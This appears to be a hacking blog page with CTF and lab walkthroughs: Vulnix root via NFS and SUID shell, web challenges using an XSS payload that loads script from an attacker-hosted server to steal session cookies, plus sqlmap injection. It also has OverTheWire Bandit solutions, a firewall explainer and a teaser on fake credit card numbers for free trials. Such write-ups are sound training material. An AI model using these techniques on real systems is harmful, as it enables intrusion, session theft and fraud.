Saturday, July 29, 2017

Exploitation Testing – Vulnix

Knock Knock !! Who's ther?? - No one!!
let me come through back door

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions

The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk

1. Finding victim machine’s (Vulnix VM) IP address.
root@kali:~# netdiscover -r 192.168.43.0/24  




2. A port scan on the victim host.
root@kali:~# nmap -sT -p- -Pn -n -v 192.168.43.33 -T5





3. Finding users of the victim host.
root@kali:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.43.33





4. Running finger against the usernames we found.





5. Since we have NFS service running on port 2049, we may be able to mount a share and find some data.





The mounted share cannot be accessed, because the root_squash flag is set.


6. Brute forcing SSH to find the password for the account named “user”.


 After that we could gain the access of the account user over SSH.




7. Finding UID of user account called vulnix and create a temporary user on our system.




8. Generate an SSH key to log in to the server as user vulnix without password.



We have to copy the generated ssh-key into the /home/vulnix/.ssh/authorized_keys file.




9. Login to the victim's machine as ‘vulnix’.





10. vulnix can run a command to open /etc/exports without typing a password.




Then we have to replace the root_squash flag with no_root_squash. Then reboot it manually.



Once the machine has rebooted, mount the partition again.




11. Once mounted, get a copy of the victim’s machine local shell and change the ownership and SID to the root one.
On my local machine, as ‘root’:


  
On the victim's machine:





There are multiple backdoors in old operating systems. But when it comes to modern OS this is kind of difficult hard. Even not possible. This is just a one method u can breach through





Friday, July 28, 2017

Web Penetration Testing - Reveal Flags

Web Penetration Testing 1 – Club Status

Turn on the intercept of burp suit and go to the web site. Then you can see the GET request. There are two cookies called PHPSESSID and vip. Then we have to edit the vip cookie value from 0 to 1 and forward the request.


Then you can see the page with the available Blog link. Then click the Blog link and the flag for this challenge is revealed.

  
1)      Web Penetration Testing 2 – Om nom nom nom


After completing challenge 1, you can browse in the Blog page. There is a user called Sycamore. Then go to the blog of Sycamore and there is a comment box. We can put comments on it. Then we have to find the vulnerabilities of this comment box. 

Type [<script>alert(“xss”)</script>](xss) in the comment box and submit it. You can see the alert message.


That’s it. We found the XSS vulnerability. The next step is to steal the PHPSESSID cookie of Sycamore. To do that, we have to host a server. We can create a file name .j containing some JavaScript to steal the user cookie. We can use pythons SimpleHTTPServer to host it on port 80.

Now we can create a XSS payload for the comment field. It looks like this.

[<script src=//<IP>/file.j>](test)

Add this comment to the blog page and wait some time. After a small time we can see the entries in the python server like this.


From that, we can get the cookie value of Sycamore. By loading the page with the cookie value we got from the server, the flag is revealed.




1)      Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The CSRF token prevents automated tools from testing payloads. Burp has a feature for this using macros.
We need to setup burp with a new session handling rule, record a macro and use it to generate new CSRF tokens for requests.




We need add custom parameter for CSRF tokens.





We need to ensure that what parameter we want to macro to update.






We need to define the scope of the session.



Then go to the Repeater and press the Go button. When you press the Go button, you can get the different CSRF tokens.


You can test some Sql injection here by adding ‘ , after the comment_id=. So, we can notice that there is Sql injection vulnerability.


Get the request to a file and name it as “deletecomment_file”.


Now we have to do the rest using Sqlmap tool.



We can see the 5 tables in the cysca database. We use the “flag” table.



Finally, we can reveal the flag.




Tuesday, July 25, 2017

What Is a Firewall?

We all heard about firewall at some point of time, what are they used for ? Do they stop viruses?
Well actually, there is a great chance that you are now using a firewall,  if  your are running a modern OS on your computer, there is be one built in, or else your security suite will have a firewall.
But what is this firewall for? Keep reading for reasons why you do, need it.

What Is a Firewall?

Lets start it with what a firewall actually is. You should understand that there are no sparks, no flames, no fuel of any kind of that stuff involved,
A firewall is a shield or barrier which is intended to protect your PC, phone or tablet from data-based malware dangers that exist everywhere on the Internet. 
Data is usually exchanged between your computer and servers and routers in cyberspace while you are using internet, and the purpose of firewalls is to monitor this data (sent in packets) and check if they are safe or not.
Firewalls do this by establishing whether the packets meet the rules that have been set up. Depending on on these rules, packets of data are rejected or accepted.
Most operating systems (both desktop and mobile) will have a basic built-in firewall, but the best results can be seen by using a dedicated firewall application. Here are 5 reasons why you should use  a Firewall.

1. A Firewall Can Protect Your Computer From Unauthorized Remote Access

The worst thing that can happen to a computer user is someone attempting to take control of it remotely. Seeing mouse of your PC move around your monitor as a remote intruder usurps your digital world, assuming control of your personal data, is petrifying.
With a well configured firewall (and a modern OS) you will have remote desktop access disabled, and thus preventing hackers from taking charge of your computer.

2. Firewalls Can Block Messages Linking to Unwanted Content

There are still people out there running older versions of Windows(i mean very old like Windows XP). Worse part is that they are using XP without any firewall, and the built-in firewall is not enabled by default.
You read that right. The Internet has a lot of malware traversing the cyberspace, waiting to pounce on the unprotected PCs. Even though your ISP can help prevent this, it is unlikely that they will be able to in a long run.

3. Firewalls Make Online Gaming Safer

In the history of video games, online gaming is one of the most significant development and it it also a potential security risk. Many kinds of malware has been developed which targets online gamers, who use an unsecured or compromised game servers.

4. You Can Block Unsuitable Content With a Firewall

So far, we have been talking mainly about blocking hackers and other types of remote access threats like  malware, but firewalls are capable of more than just that. Apart from protecting you from ransomware directories, firewall applications also have an option to block particular online locations.

5. Firewalls Can Be Hardware or Software

As we said above, firewalls don not necessarily have to be just software. Hardware firewalls are also found in most homes, built into your router. You can access these firewalls by using the administrative credentials for the router, and once you’ve signed in you should be able to review the options and change them if necessary.
Hope you like this article, please comment your opinion below.

Monday, July 24, 2017

WarGames - OverTheWire




Bandit Level 0 -> 1




Recently I’ve been obsessed with a wargaming site called overthewire.org. At the time of this writing I have made it through a few of the servers already, but I will post my solutions to the entry level server they offer, “Bandit”. This is also the recommended place to start if you are new to the site. You should already be familiar with basic Linux commands before attempting this wargame. However, the first page of Bandit explains what to do if you don’t know a command. You do need to use a bit of your own intuition to figure out how to make it from one level to the next.
I have been through a good handful of wargaming sites in the past and I find this one to be of good quality with an interesting variety of servers to play. For those who don’t know what a wargame is, a wargame in hacking is a security challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. Most of the servers here are about program exploitation on the Linux platform. We do not have to be on a Linux system to play these. But why not? If you have access to a Linux box, a real terminal is the way to go. Puttyis the way to go on Windows.  But I digress, use my posted solutions to learn and understand the levels or compare with your own solutions. Enjoy!
Level 0:
We simply ssh to bandit0@bandit.labs.overthewire.org using the password bandit0 and we are in our shell.
Level 0 -> 1:
Once in, we can see that the readme file is in our home directory. Simply “cat” it and grab the password for level1.
1
2
3
4
bandit0@melissa:~$ ls
readme
bandit0@melissa:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1
Level 1-> 2:
We are told that the password is in a file called “-“. We need to delimit the dash to read it.
1
2
3
4
bandit1@melissa:~$ ls
-
bandit1@melissa:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
Level 2 ->3:
This time we simply need to read a file with spaces in it’s name. Let’s surround the file name in quotes.
1
2
3
4
bandit2@melissa:~$ ls
spaces in this filename
bandit2@melissa:~$ cat "spaces in this filename"
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
Level 3->4:
We are told the file we need is in a hidden file in the inhere directory.
1
2
3
4
5
6
7
8
9
10
bandit3@melissa:~$ ls
inhere
bandit3@melissa:~$ cd inhere
bandit3@melissa:~/inhere$ ls -la
total 12
drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 .
drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit4 bandit3   33 2012-05-10 23:51 .hidden
bandit3@melissa:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB
Level 4 ->5:
We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
bandit4@melissa:~$ ls
inhere
bandit4@melissa:~$ cd inhere
bandit4@melissa:~/inhere$ ls -la
total 48
drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 .
drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file00
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file01
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file02
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file03
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file04
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file05
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file06
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file07
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file08
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file09
bandit4@melissa:~/inhere$ file ./-*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@melissa:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh
Level 5-> 6:
This is similar to the previous, except we have some more file attributes to look for. As well as more files to look through.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
bandit5@melissa:~$ ls
inhere
bandit5@melissa:~$ cd inhere
bandit5@melissa:~/inhere$ ls -la
total 88
drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 .
drwxr-xr-x  3 root root    4096 2012-05-10 23:51 ..
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere00
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere01
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere02
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere03
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere04
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere05
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere06
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere07
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere08
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere09
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere10
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere11
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere12
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere13
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere14
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere15
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere16
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere17
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere18
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere19
bandit5@melissa:~/inhere$ find ./ -size 1033c
./maybehere07/.file2
bandit5@melissa:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7
Level 6->7:
The file can be anywhere on the server, but we are given it’s attributes. This is a job for find. The command attached to the end gets rid of garbage returns and allows viewing of our password file amongst several others with the same attributes.
1
2
3
4
bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
Level 7->8:
The password for the next level is stored in the file data.txt next to the word millionth. We can pipe cat to grep for this.
1
2
3
4
bandit7@melissa:~$ ls
data.txt
bandit7@melissa:~$ cat data.txt | grep millionth
millionth       cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Level 8->9:
Here we need to find a unique line among many. We can pipe a few commands together to do this. Note the commands do need to be in this order.
1
2
3
4
bandit8@melissa:~$ ls
data.txt
bandit8@melissa:~$ cat data.txt | sort | uniq -u
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
Level 9->10:
The password for the next level is stored in the file data.txt among of few lines of human-readable strings starting with ‘=’ characters.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bandit9@melissa:~$ ls
data.txt
bandit9@melissa:~$ strings data.txt | grep '='
========== the
R=ev2,
NF=!^
M5Q=
========== password
TuI@=
========== iss
c       =$
w=RO
eD=p
jR=JlB
G========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
:=*1p
KA=%
We can see our password string amongst our output.
Level 10->11:
The password for the next level is stored in the file data.txt, which contains base64 encoded data. We need to decode the file.
1
2
3
4
bandit10@melissa:~$ ls
data.txt
bandit10@melissa:~$ base64 -d data.txt
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
Level 11->12:
The password is encoded using simple rot13 encryption. There are many options to solve this including using various scripting languages and simply using an online rot13 decoder. Let’s try a solution in our shell.
1
2
3
4
bandit11@melissa:~$ ls
data.txt
bandit11@melissa:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
That command is given on the wikipedia page for rot13
Level 12->13:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it is necessary to create a directory under /tmp in which you can work using mkdir. We need to decompress and check the file over and over again until we get the right format.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
bandit12@melissa:~$ ls
data.txt
bandit12@melissa:~$ file data.txt
data.txt: ASCII text
bandit12@melissa:~$ mkdir /tmp/stw
bandit12@melissa:~$ cd /tmp/stw
bandit12@melissa:/tmp/stw$ xxd -r ~/data.txt > data.txt
bandit12@melissa:/tmp/stw$ file data.txt
data.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat data.txt > dataNew
bandit12@melissa:/tmp/stw$ ls
dataNew  data.txt
bandit12@melissa:/tmp/stw$ file dataNew
dataNew: bzip2 compressed data, block size = 900k
bandit12@melissa:/tmp/stw$ bzip2 -d dataNew
bzip2: Can't guess original name for dataNew -- using dataNew.out
bandit12@melissa:/tmp/stw$ ls
dataNew.out  data.txt
bandit12@melissa:/tmp/stw$ file dataNew.out
dataNew.out: gzip compressed data, was "data4.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat dataNew.out > evenNewer
bandit12@melissa:/tmp/stw$ ls
dataNew.out  data.txt  evenNewer
bandit12@melissa:/tmp/stw$ file evenNewer
evenNewer: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf evenNewer
data5.bin
bandit12@melissa:/tmp/stw$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf data5.bin
data6.bin
bandit12@melissa:/tmp/stw$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melissa:/tmp/stw$ bzip2 -d data6.bin
bzip2: Can't guess original name for data6.bin -- using data6.bin.out
bandit12@melissa:/tmp/stw$ ls
data5.bin  data6.bin.out  dataNew.out  data.txt  evenNewer
bandit12@melissa:/tmp/stw$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf data6.bin.out
data8.bin
bandit12@melissa:/tmp/stw$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat data8.bin > lost
bandit12@melissa:/tmp/stw$ ls
data5.bin  data6.bin.out  data8.bin  dataNew.out  data.txt  evenNewer  lost
bandit12@melissa:/tmp/stw$ file lost
lost: ASCII English text
bandit12@melissa:/tmp/stw$ cat lost
The password is <strong>8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL</strong>
At last, we have our password.
Level 13->14:
This one switches things up a little. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. We need to borrow an SSH key to move on.
1
2
3
4
5
6
7
8
9
10
bandit13@melissa:~$ ls
sshkey.private
bandit13@melissa:~$ ssh -i sshkey.private bandit14@localhost
Could not create directory '/home/bandit13/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
bandit14@melissa:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
And just like that, we are dumped into bandit14’s shell.
Level 14->15:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost. Here we have a lesson in telnet. Basically, we will use telnet to connect to localhost on port 30000 and enter the password while we are still in bandit14’s shell.
1
2
3
4
5
6
7
8
9
bandit14@melissa:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
 
Connection closed by foreign host.
Level 15->16:



Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to &qu...